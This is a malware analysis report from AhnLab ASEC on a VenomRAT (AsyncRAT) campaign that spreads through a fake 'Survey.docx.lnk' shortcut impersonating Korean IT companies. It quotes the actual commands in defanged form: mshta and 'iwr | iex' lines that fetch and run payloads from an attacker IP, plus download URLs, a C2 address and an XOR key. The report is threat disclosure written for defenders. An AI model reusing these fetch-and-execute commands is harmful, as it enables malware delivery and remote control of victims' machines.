Distribution of VenomRAT (AsyncRAT) Impersonating Korean IT Companies
AhnLab SEcurity intelligence Center (ASEC) found a shortcut file (.lnk) that downloads AsyncRAT (VenomRAT). In order for the LNK file to disguise itself as a legitimate Word file, it was distributed with the name ‘Survey.docx.lnk’ inside a compressed file which also contained a legitimate text file. Above all, users need to remain vigilant, as the executable file (blues.exe) used in the attack is disguised as a Korean company’s certificate.
The overall operation process of the malware is as shown below.
The compressed file is disguised as a ‘survey’ to encourage users to open it. It includes a text file and the malicious LNK file. The text file contains instructions that guide users to execute the malicious LNK file.
The LNK file includes malicious commands and when it is executed, it runs additional script codes by connecting to an external URL through mshta.
- Execution command
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe . $env:C:\W*\S*2\m*h?a.* ‘hxxp://194.33.191[.]248:7287/docx1.hta’
hxxp://194.33.191[.]248:7287/docx1.hta has obfuscated strings inside. When they are decoded, a PowerShell command can be seen. As shown in Figure 5, this command downloads additional files and saves them in the %appdata% folder before executing them.
- Download URL
hxxp://194.33.191[.]248:7287/qfqe.docx
hxxp://194.33.191[.]248:7287/blues.exe
The downloaded qfqe.docx file is a legitimate Word document that contains survey information, which makes it hard for users to notice any malicious activities.
The blues.exe file that is downloaded with the Word file is a downloader-type malware disguised as a Korean IT company’s certificate. When executed, it downloads additional scripts through PowerShell.
- Execution command
powershell iwr hxxp://194.33.191[.]248:7287/sys.ps1 -UseBasicParsing | iex
The sys.ps1 executed through the blues.exe file shown above is also a downloader-type malware that downloads additional data from hxxp://194.33.191[.]248:7287/adb.dll and executes it in a fileless format.
adb.dll has an encoded shellcode inside, and this is decrypted by calculating the XOR of Base64 and the ‘sorootktools’ string.
The ultimately executed shellcode performs keylogging and leaks user PC information with the RAT-type malware VenomRAT (AsyncRAT). It can also perform various malicious behaviors by receiving commands from the threat actor.
- C2 : 194.33.191[.]248:4449
Malicious shortcut files disguised as legitimate documents are continuously being distributed. Users can mistake the shortcut file for a normal document, as the ‘.lnk’ extension is not visible on the names of the files. Therefore, particular caution is advised.
[File Detection]
Trojan/LNK.Runner (2024.01.16.00)
Trojan/HTML.Agent.SC196238 (2024.01.17.00)
Trojan/Win.Generic.C5572807 (2024.01.12.03)
Trojan/PowerShell.Agent (2024.01.17.00)
Trojan/Win.Generic.C5337844 (2022.12.21.00)
[Behavior Detection]
Execution/MDP.Powershell.M2514
Gain access to related IOCs and detailed analysis by subscribing to AhnLab TIP. For subscription details, click the banner below.
